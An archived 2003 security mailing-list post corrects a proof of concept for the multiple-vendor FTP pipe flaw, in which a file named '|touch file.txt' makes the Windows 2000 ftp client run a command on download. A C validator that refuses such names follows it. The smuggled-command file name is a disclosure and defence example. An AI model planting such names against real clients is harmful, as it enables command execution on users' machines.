Open Source and information security mailing list archives
 
From: schoe at oicinc.com (SChoe)
Subject: RE: Multiple Vendor FTP pipe Vulnerability

Oops.  The "touch" syntax is wrong due to my lack of cut-n-paste skills.

touch \|touch\ file     <--------Wrong
touch \|touch\ file.txt <--------Right

My bad...

On Tue, 25 Feb 2003, SChoe wrote:

> Date: Tue, 25 Feb 2003 12:17:50 -1000 (HST)
> From: SChoe <schoe@...inc.com>
> To: bugtraq@...urityfocus.com
> Cc: full-disclosure@...ts.netsys.com
> Subject: RE: Multiple Vendor FTP pipe Vulnerability
>
> Securityfocus has a post on its website regarding this vulnerability in
> many ftp clients.  I've tested and subsequently validated this issue on
> many of the platforms mentioned in their advisory.  They mention
> the Netscape client on Windows 2000 Professional, but fail to
> mention that the commandline ftp client included with win2k (server and
> pro) is also vulnerable.
>
> <-----------------------snip----------------------->
> # Create file on ftp server for download by client.
> schoe@ftp:/home/ftp$ touch \|touch\ file
>
> # Start commandline ftp client on win2k.
> Microsoft Windows 2000 [Version 5.00.2195]
> <C> Copyright 1985-2000 Microsoft Corp.
>
> C:\ ftp ftp.xxxx.com
> ....
> ftp> get "|touch file.txt"
> ...
> ftp> quit
> 221 Goodbye.
>
> # "C:\file.txt" should now exist.
> <-----------------------snap----------------------->
>
> Multiple Vendor FTP pipe Vulnerability
> ======================================
> www.securityfocus.com/bid/396/info


.-------------------------------------------.
| Sung J. Choe <schoe[at]oicinc.com>, TICSA |
| Systems Admin, Facility Security Officer  |
.-------------------------------------------.---.
            | Oceanic Imaging Consultants, Inc. |
            | Phone #: (808) 539.3634           |
            .-----------------------------------.
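
A client-side check for the behaviour demonstrated in the message above, as an added example that is not part of the original post or of any vendor's fix. It assumes the client would otherwise reuse the server-supplied name as the local file name; `safe_local_name` and `count_refused` are hypothetical names and the listing is constructed.

```c
#include <stdio.h>
#include <string.h>

/* Decide whether a file name sent by the server may be used unchanged as the
 * local target of a download. Returns 1 if acceptable, 0 if it must be refused. */
int safe_local_name(const char *remote)
{
    const unsigned char *p;

    if (remote == NULL || remote[0] == '\0')
        return 0;
    /* Leading '|': the client hands the rest to the shell instead of
     * creating a file. This is the case shown in the post. */
    if (remote[0] == '|')
        return 0;
    /* "-" means stdin/stdout to BSD-derived ftp clients; "." and ".." are
     * directories, never download targets. */
    if (!strcmp(remote, "-") || !strcmp(remote, ".") || !strcmp(remote, ".."))
        return 0;
    for (p = (const unsigned char *)remote; *p; p++) {
        /* No path separators (either platform) and no control bytes:
         * the download must land in the current directory. */
        if (*p == '/' || *p == '\\' || *p < 0x20 || *p == 0x7f)
            return 0;
    }
    return 1;
}

/* Count how many names in a (constructed) server listing would be refused. */
int count_refused(const char *const names[], int n)
{
    int i, refused = 0;
    for (i = 0; i < n; i++)
        if (!safe_local_name(names[i]))
            refused++;
    return refused;
}

int main(void)
{
    /* Constructed sample listing; the first entry is the name from the post. */
    const char *const listing[] = { "|touch file.txt", "file.txt",
                                    "../file.txt", "-", "notes|old.txt" };
    int i, n = (int)(sizeof listing / sizeof listing[0]);

    for (i = 0; i < n; i++)
        printf("%-18s %s\n", listing[i],
               safe_local_name(listing[i]) ? "accept" : "refuse");
    printf("refused: %d of %d\n", count_refused(listing, n), n);
    return 0;
}
```

Only a leading `|` is refused as a pipe marker, so `notes|old.txt` is accepted; a stricter policy could reject the character anywhere in the name.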

